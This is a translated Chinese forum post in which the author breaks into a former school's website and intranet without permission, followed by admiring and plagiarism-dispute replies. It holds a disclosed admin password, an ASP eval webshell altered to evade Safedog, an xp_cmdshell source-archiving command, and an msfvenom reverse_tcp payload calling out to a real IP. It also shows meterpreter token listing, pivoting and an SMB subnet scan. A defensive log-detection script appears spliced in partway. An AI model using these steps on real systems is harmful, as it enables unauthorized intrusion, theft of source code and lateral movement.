    宝宝 posted on 2018-1-29 20:48:30
    On a whim I wanted to grab the source of my school's main site and have a look. Today is bright and sunny, so let me do another security test for my old school.
    I had tested it before: the main site runs 动易CMS2006 (PowerEasy CMS 2006), and there are no publicly known vulnerabilities for it online.
    图片1.png

    The middleware is IIS 7.5; a misconfiguration leaves directory browsing enabled, which isn't much use either.
    图片2.png

    From the information at the bottom of the home page I learned the site had been built by an outside company:
    图片3.png

    Then I did a security test of XXXX Network Company and obtained the super administrator password for their sub-site www.****.com.cn:82: **wl****1917
    图片4.png

    The forum software is Discuz!NT 3.1.0, and you can get a shell from the admin panel: visiting http://www.****.com.cn:82/admin/global/global_templatesedit.aspx?path=..%2ftools%2f&filename=rss.aspx&templateid=1&templatename=Default
    lets you edit the corresponding rss.aspx file and replace it with a webshell "security check script".
    图片5.png

    Then I visited it and found it had been blocked by 安全狗 (Safedog)...
    图片6.png
    This Safedog looks the same as it did when I dealt with it years ago, so it seems to be an old version that the admin never updated. Just tweak the one-line shell a little:

    <%
    dim luan
    luan=request("suyan")
    response.write("Hello " & suyan)
    eval luan
    %>


    And that got past the dog...
    Connecting with 菜刀 (China Chopper) 2010 gave a 403.
    图片7.png
    From the HTTP headers shown by Chopper, it had been bitten by the dog, i.e. blocked by Safedog.
    Switching to the 2016 version of Chopper (download: search Baidu yourself) connects normally:
    图片8.png


    Then try executing a command:
    图片9.png

    The result: [Err] ActiveX 部件不能创建对象 ("ActiveX component can't create object"). That means the component has been disabled, so I had to take a more troublesome route. The Discuz!NT 3.1.0 admin panel can execute SQL statements directly; if the earlier method doesn't get you a shell, you can try executing SQL to get one. I couldn't be bothered to find the database password and connect, so I went straight to the SQL execution page in the admin panel. Pack the main site's source with a command:

    exec xp_cmdshell 'C:\progra~2\WinRAR\Rar.exe a -k -r -s -m1 D:/****web/yzblog/tools/suyan.rar D:/****web/PowerEasy2006/';

    图片10.png

    Executing commands earlier had confirmed SYSTEM privileges. If xp_cmdshell fails, search Baidu for "恢复xp_cmdshell" (re-enabling xp_cmdshell). As an aside, to pack a website on Linux:

    tar -czf website.tar.gz /home/wwwroot

    图片11.png

    Then you can see the packed source is 500 MB, too big, so I didn't download it. It was only a security test, after all, and I deleted the archive once it was packed.
    Then I got curious whether there were any servers on the school intranet that could be exploited directly through an SMB overflow, so I went on to upload an AV-evading Meterpreter (download: search Baidu yourself). To fill a bit more space, I'll paste it:

    > msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=103.27.187.212 -e x86/shikata_ga_nai -i 11 -f py -o C:/suyan/suyan.py

    DL is deprecated, please use Fiddle
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    Found 1 compatible encoders
    Attempting to encode payload with 11 iterations of x86/shikata_ga_nai
    x86/shikata_ga_nai succeeded with size 360 (iteration=0)
    x86/shikata_ga_nai succeeded with size 387 (iteration=1)
    x86/shikata_ga_nai succeeded with size 414 (iteration=2)
    x86/shikata_ga_nai succeeded with size 441 (iteration=3)
    x86/shikata_ga_nai succeeded with size 468 (iteration=4)
    x86/shikata_ga_nai succeeded with size 495 (iteration=5)
    x86/shikata_ga_nai succeeded with size 522 (iteration=6)
    x86/shikata_ga_nai succeeded with size 549 (iteration=7)
    x86/shikata_ga_nai succeeded with size 576 (iteration=8)
    x86/shikata_ga_nai succeeded with size 603 (iteration=9)
    x86/shikata_ga_nai succeeded with size 630 (iteration=10)
    x86/shikata_ga_nai chosen with final size 630
    Payload size: 630 bytes
    Saved as: C:/suyan/suyan.py

    C:\PentestBox\bin\metasploit-framework
    >

    Note: make the modifications as described in my earlier article; I won't paste how, it takes too much space. After modifying, pack it with PyInstaller:

    C:\cnzxsoft\pyinstaller-2.0>python PyInstaller.py --console --onefile luan.py
    548 INFO: wrote C:\cnzxsoft\pyinstaller-2.0\luan\luan.spec
    641 INFO: Testing for ability to set icons, version resources...
    743 INFO: ... resource update available
    746 INFO: UPX is not available.
    2071 INFO: checking Analysis
    2072 INFO: building Analysis because out00-Analysis.toc non existent
    2072 INFO: running Analysis out00-Analysis.toc
    2072 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable

    15654 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
    15655 INFO: Found manifest C:\Windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
    15668 INFO: Searching for file msvcr90.dll
    15670 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcr90.dll
    15673 INFO: Searching for file msvcp90.dll
    15674 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcp90.dll
    15675 INFO: Searching for file msvcm90.dll
    15677 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcm90.dll
    15960 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\support\_pyi_bootstrap.py
    16641 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\archive.py
    16733 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\carchive.py
    16822 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\iu.py
    16861 INFO: Analyzing luan.py
    16931 INFO: Hidden import 'encodings' has been found otherwise
    16933 INFO: Looking for run-time hooks
    16934 INFO: Analyzing rthook C:\cnzxsoft\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py
    17144 INFO: Warnings written to C:\cnzxsoft\pyinstaller-2.0\luan\build\pyi.win32\luan\warnluan.txt
    17150 INFO: checking PYZ
    17151 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
    17152 INFO: building PYZ out00-PYZ.toc
    19378 INFO: checking PKG
    19379 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
    19381 INFO: building PKG out00-PKG.pkg
    20487 INFO: checking EXE
    20492 INFO: rebuilding out00-EXE.toc because luan.exe missing
    20493 INFO: building EXE from out00-EXE.toc
    20510 INFO: Appending archive to EXE C:\cnzxsoft\pyinstaller-2.0\suyan\dist\suyan.exe

    C:\cnzxsoft\pyinstaller-2.0>




    Upload it with Chopper and run it through a SQL statement:
    图片12.png

    Scan with MSF:

    meterpreter > run post/windows/manage/migrate

     Running module against WIN-TOYQDX47WMW
     Current server process: suyan.exe (5996)
     Spawning notepad.exe process to migrate to
    [+] Migrating to 4316
    [+] Successfully migrated to process 4316

    meterpreter > sysinfo
    Computer        : WIN-TOYQDX47WMW
    OS              : Windows 2008 (Build 6002, Service Pack 2).
    Architecture    : x64
    System Language : zh_CN
    Domain          : WORKGROUP
    Logged On Users : 0
    Meterpreter     : x86/windows

    meterpreter >use incognito
    Loading extension incognito...success.

    meterpreter > list_tokens -u

    Delegation Tokens Available
    ========================================
    IIS APPPOOL\jwweb
    NT AUTHORITY\IUSR
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM

    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\ANONYMOUS LOGON

    meterpreter > run get_local_subnets

    [!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
    [!] Example: run post/windows/manage/autoroute OPTION=value [...]
    Local subnet: 172.16.11.0/255.255.255.0
    meterpreter > run post/windows/manage/autoroute

     Running module against WIN-TOYQDX47WMW
     Searching for subnets to autoroute.
    [+] Route added to subnet 172.16.11.0/255.255.255.0 from host's routing table.
    [+] Route added to subnet 169.254.0.0/255.255.0.0 from Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #4.
    meterpreter > background
     Backgrounding session 2...
    msf exploit(handler) > route print

    IPv4 Active Routing Table
    =========================

    Subnet             Netmask            Gateway
    ------             -------            -------
    169.254.0.0        255.255.0.0        Session 2
    172.16.11.0        255.255.255.0      Session 2

     There are currently no IPv6 routes defined.
    msf exploit(handler) >  use auxiliary/scanner/smb/
    use auxiliary/scanner/smb/pipe_auditor           use auxiliary/scanner/smb/smb_enumshares         use auxiliary/scanner/smb/smb_ms17_010
    use auxiliary/scanner/smb/pipe_dcerpc_auditor    use auxiliary/scanner/smb/smb_enumusers          use auxiliary/scanner/smb/smb_uninit_cred
    use auxiliary/scanner/smb/p**ec_loggedin_users  use auxiliary/scanner/smb/smb_enumusers_domain   use auxiliary/scanner/smb/smb_version
    use auxiliary/scanner/smb/smb2                   use auxiliary/scanner/smb/smb_login
    use auxiliary/scanner/smb/smb_enum_gpp           use auxiliary/scanner/smb/smb_lookupsid
    msf exploit(handler) >use auxiliary/scanner/smb/smb_version
    msf auxiliary(smb_version) > set rhosts 172.16.11.1-255
    rhosts => 172.16.11.1-255
    msf auxiliary(smb_version) > sthreads 10
    threads => 10
    msf auxiliary(smb_version) > run

     172.16.11.11:445      - Host is running Windows 2008 Standard SP2 (build:6002) (name:WIN-TOYQDX47WMW) (workgroup:WORKGROUP )
     172.16.11.12:445      - Host is running Windows 2012 R2 Standard (build:9600) (name:WIN-HKFJ6JJA9L5)
     Scanned  29 of 255 hosts (11% complete)
     Scanned  52 of 255 hosts (20% complete)
     Scanned  77 of 255 hosts (30% complete)
     Scanned 102 of 255 hosts (40% complete)
     Scanned 131 of 255 hosts (51% complete)
     Scanned 153 of 255 hosts (60% complete)
     Scanned 179 of 255 hosts (70% complete)
     Scanned 204 of 255 hosts (80% complete)
    ^C Caught interrupt from the console...
     Auxiliary module execution completed
    msf auxiliary(smb_version) >

    It looks like there are only two machines.. and the other one is Win 2012 R2; the SMB overflow exploit, as far as I have tested, only works on XP, 7 and 2008. My goal had already been achieved, so I'll stop here.
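    As a defender's counterpart to the template-editor trick in the post above, here is an added example (not code from the post or from Discuz!NT) that scans IIS W3C log lines for the `path=..%2f` traversal on global_templatesedit.aspx and then flags POSTs to whatever file that traversal wrote. The log lines are constructed, and the template base directory `/templates/` is an assumption about where the editor resolves `path`.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote

# Field order of the constructed log below; real IIS logs state theirs
# in the '#Fields:' header line, so adjust FIELDS to match.
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]
# Assumption: the editor resolves 'path' under this directory, so '../' lands in the web root.
TEMPLATE_BASE = "/templates/"
# Constructed sample: one legitimate edit, the traversal that rewrites
# tools/rss.aspx, then a POST to the rewritten file (webshell traffic).
SAMPLE_LOG = """\
2018-01-29 20:31:02 10.0.0.5 GET /admin/global/global_templatesedit.aspx path=&filename=index.htm&templateid=1 82 admin 203.0.113.9 Mozilla/5.0 200
2018-01-29 20:32:10 10.0.0.5 GET /admin/global/global_templatesedit.aspx path=..%2ftools%2f&filename=rss.aspx&templateid=1&templatename=Default 82 admin 203.0.113.9 Mozilla/5.0 200
2018-01-29 20:32:15 10.0.0.5 POST /admin/global/global_templatesedit.aspx path=..%2ftools%2f&filename=rss.aspx&templateid=1&templatename=Default 82 admin 203.0.113.9 Mozilla/5.0 302
2018-01-29 20:33:40 10.0.0.5 POST /tools/rss.aspx - 82 - 203.0.113.9 Mozilla/4.0+(compatible;+MSIE+6.0) 200
"""
# '..' as a whole path segment, with either slash style.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def parse_line(line):
    """Split one W3C line into a dict, or None if malformed."""
    parts = line.split(" ")
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def decode_param(query, name):
    """parse_qs decodes one layer; the extra unquote catches double-encoded '%252e%252e%252f'."""
    value = parse_qs(query, keep_blank_values=True).get(name, [""])[0]
    return unquote(value)

def analyze(log_text):
    """Return (time, client ip, reason) for traversal writes and later POSTs to the files they created."""
    findings, written = [], set()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        stem = rec["cs-uri-stem"].lower()
        if stem.endswith("/global_templatesedit.aspx"):
            path = decode_param(rec["cs-uri-query"], "path")
            if TRAVERSAL.search(path):
                fname = decode_param(rec["cs-uri-query"], "filename")
                target = posixpath.normpath(TEMPLATE_BASE + path.replace("\\", "/") + "/" + fname)
                written.add(target.lower())
                findings.append((rec["time"], rec["c-ip"], f"template editor traversal writes {target}"))
        elif stem in written and rec["cs-method"] == "POST" and rec["sc-status"] == "200":
            findings.append((rec["time"], rec["c-ip"], f"POST to file written via traversal: {stem}"))
    return findings
```

    A legitimate edit with an empty `path` produces no finding, so the rule fires only on the traversal and on traffic to the file it planted.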
    yyyxy posted on 2018-1-30 12:02:13
    http://lu4n.com/a-simple-pentest-2017-04-19/, if this isn't your blog, then you have infringed someone else's copyright. Please give a reply.
    hack_xiaofeng posted on 2018-1-30 18:37:19
    yyyxy posted on 2018-1-30 12:02:
    http://lu4n.com/a-simple-pentest-2017-04-19/, if this isn't your blog, then you have infringed someone else's copyright. Please give ...

    This is an article from our WeChat public account, submitted by an internal member; the full article can be read on our public account.
    Posted on 2018-1-30 18:39:44
    hack_xiaofeng posted on 2018-1-30 18:37:
    This is an article from our WeChat public account, submitted by an internal member; the full article can be read on our public account ...

    If there really is a problem, I can delete the post on my end.
    http://lu4n.com/a-simple-pentest-2017-04-19/ is the original article.

    Post thief? And you have the nerve to tag it as original?
    Posted on 2018-1-30 16:25:15
    No respect for other people's intellectual property? If your original post were stolen, without even a credit, how would you feel...
    666. Awesome, bro.
    Posted on 2018-1-30 10:14:56
    Impressive, learned something.
    How did you know the super administrator password in the first place?
    Posted on 2018-1-30 10:42:14
    6666666666
    Learned something.
    Posted on 2018-1-30 12:06:25
    You naughty kid, you've wrecked the very site you study on.
    So impressive!!!
    I don't get it... why does Chopper 2010 get a 403 while the 2016 version works fine? Is the 2016 version better looking?
    666. Awesome, sis.